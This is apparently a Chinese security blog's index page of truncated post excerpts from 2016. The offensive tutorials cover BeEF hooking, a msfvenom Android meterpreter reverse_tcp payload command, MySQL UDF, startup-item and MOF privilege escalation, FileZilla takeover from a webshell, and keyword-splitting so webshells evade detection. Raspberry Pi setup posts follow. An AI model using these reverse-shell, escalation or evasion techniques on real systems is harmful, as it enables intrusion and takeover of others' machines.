Eternal 8年前 (2016-08-17) 11249浏览 2评论

00×01 首先，我们来到beef安装目录下，启动 ./beef 。这里就不做过多讲解了！成功启动后，我们可以在启动界面找到 UI 的登录地址及 hook.js 的文件地址。如下： Hook URL: http://192.168.80.1...

Eternal 8年前 (2016-08-16) 11852浏览 0评论

话不多说，我们直接切入正题。 1.首先我们打开Kali的命令终端，输入如下命令: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 >/roo...

Eternal 8年前 (2016-08-15) 11654浏览 0评论

关于UDF提权，也是现在比较常见的MySQL类提权方式之一。它的提权原理也非常简单！即是利用了root 高权限，创建带有调用cmd的函数的udf.dll动态链接库！这样一来我们就可以利用 system权限进行提权操作了！ 在开始进行UDF提权前，我们...

Eternal 8年前 (2016-08-14) 4346浏览 0评论

关于MySQL的启动项提权，听其名知其意。就是将一段 VBS脚本导入到 ?C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下，如果管理员重启了服务器，那么就会自动调用该脚本，并执行其中的用户添加及提权...

Eternal 8年前 (2016-08-13) 8579浏览 1评论

关于 mof 提权的原理其实很简单，就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。下面简单演示下 mo...

Eternal 8年前 (2016-08-12) 8320浏览 0评论

话不多说，我们直接操作！ 首先我们通过 webshell 找到 FileZilla 的文件目录，找到 FileZilla Server Interface.xml 文件，打开。我们可以看到它的连接地址：127.0.0.1 及端口：14147，密码这里...

Eternal 8年前 (2016-08-11) 5502浏览 0评论

1.关键字拆分。 ? ?? ?? ?比如assert，可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。 ??? ??...

Eternal 8年前 (2016-08-11) 6185浏览 1评论

之所以要在raspbian系统上结合Kali功能，是因为经本人测试直接在小派上安装Kali，部分功能无法正常使用。 例如无线破解无法检测到网卡驱动。其次，对于一般人而言，下载安装一个kali不仅没必要，还显得过于臃肿。话不多说，下面让我们一起来动手操...

Eternal 8年前 (2016-08-10) 4685浏览 1评论

树莓派，相信大家不会陌生。它是电子发烧友手中的神兵利器，也为程序开发者和编程学习者，提供了很好的编程学习平台。好了就说这么多!下面让我们一起，走进树莓派的世界。 (一).首先让我们一起了解下树莓派的各个部件及功能。如图:   从树莓派的结...

Eternal 8年前 (2016-08-09) 5276浏览 1评论

使用SDFormatter将u盘和sd卡格式化，使用USB Image Tool 将2016-03-18-raspbian-jessie写入sd卡。 把sd卡插入树莓派sd卡槽，并且将u盘插入usb槽内，启动树莓派。 查看u盘 sudo fdisk ...